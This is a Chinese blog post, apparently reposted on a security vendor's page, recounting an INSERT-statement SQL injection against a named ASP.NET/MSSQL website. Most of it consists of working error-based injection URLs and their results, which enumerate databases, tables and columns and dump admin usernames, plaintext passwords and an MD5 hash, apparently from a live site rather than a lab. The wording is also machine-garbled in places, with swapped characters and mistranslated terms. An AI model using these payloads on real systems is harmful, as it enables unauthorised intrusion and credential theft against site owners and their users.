|
|
|
联系客服020-83701501

insert注入

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
insert注入

群里有人在问insert型的怎么注射,insert模范的我还没碰着过呢,就去看了看,做了1下笔记备忘。
http://www.bbyoo.com/nanyin.aspx?ProID=四9579′ 加1个点,报错

是insert模范的语句,百度了1下,对insert语句的注射大抵有个熟谙,是以起头打探消息。
提交:http://www.kunlun.com/nanyin.aspx?ProID=四9579′,cast(@@version/**/as/**/int),null);–

不兼容…把int换成varchar,页面返回正常。。。百度1下,原本是mssql不准许将text或ntext型数据间接转换为int型
要想爆出消息看来得找个varchar 或nvarchar模范的字段,把后背2个对调了1下地位,凋射爆出。
提交:http://www.kunlun.com/nanyin.aspx?ProID=四9579′,null,cast(system_user/**/as/**/int));–
在将 nvarchar 值 ‘AFDataLogin’ 转换成数据模范 int 时腐烂。
很好,再接着爆消息,收集的1些如下。
version:Microsoft SQL Server 2005 – 9.00.四035.00 (Intel X86)……Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
servername:SQL2005
host_name:IBM1
db_name:kunlun
user_name:dbo
可以看出 网站与数据库分散,看来想差异备份或log备份是不可的了,只能爆背景帐号、密码进背景了。
先爆1下库,布局
http://www.bbyoo.com/nanyin.aspx?ProID=四9579′,null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1)–
修改第扫尾1个dbid的值,爆出13个库…
1:master
2:tempdb
3:model
四:msdb
5:kunlun_BBS
6:kunlun
7:New_AF
8:AF_Back
9:Console
10:Newkunlun
11:Newkunlun2
12:Oldkunlun
13:NewBBS
接下来爆表名
布局: http://www.bbyoo.com/nanyin.aspx?ProID=四9579′,null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/top/**/1/**/name/**/from/**/sysobjects/**/where/**/xtype=’u̵7;/**/and/**/name/**/not/**/in(select/**/top/**/0/**/name/**/from/**/sysobjects/**/where/**/xtype=’u̵7;))–
修改第2个top的值,从0递增下去。爆第6张表时很欢腾,即刻去爆字段、密码。
1:AF_UserAccount
2:YX_Unit
3:AF_UnionCompany
四:YX_FlashXZ
5:AF_UserPointLogs
6:Buy_Admin
爆指定表Buy_Admin的字段
http://www.bbyoo.com/nanyin.aspx?ProID=四9579′,null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/top/**/1/**/name/**/from/**/syscolumns/**/where/**/id/**/in/**/(select/**/id/**/from/**/sysobjects/**/where/**/name=’Buy_Admin’)/**/and/**/name/**/not/**/in/**/(select/**/top/**/0/**/name/**/from/**/syscolumns/**/where/**/id/**/in/**/(select/**/id/**/from/**/sysobjects/**/where/**/name=’Buy_Admin’)))–
爆出来了,1样是修改第2个top的值。
密码:af_APass
ID:af_ID
用户:af_AName
看到name和pass很欢腾啊,即刻爆内容。
提交:
http://www.bbyoo.com/nanyin.aspx?ProID=四9579′,null,null);select/**/*/**/from/**/Buy_Admin/**/where/**/af_ID=2/**/and/**/1=(select/**/af_AName/**/from/**/Buy_Admin/**/where/**/af_ID=2)–
爆出来了,仍是明文的,呵呵,找背景登录。
hjbadmin hjbmanager
yck’ yck
欢喜早了,怎么也登录不了。唉,再爆表把,爆到第N张,看见YX_Manage,欢腾了,这回没错了,爆字段爆内容
YX_AdminUser YX_Pwd
hgnadmin 50252EC697150CC9AA69A四7333C716B8
遗憾啊,md5解密不出….到这里差不多就完结了。很晚了。
哦,忘了说了,这个是dbo权限,呵呵。
本文转自单独守候博客由Internet平安攻防研究室(www.91ri.org)消息平安小组收集整理.

数安新闻+更多

证书相关+更多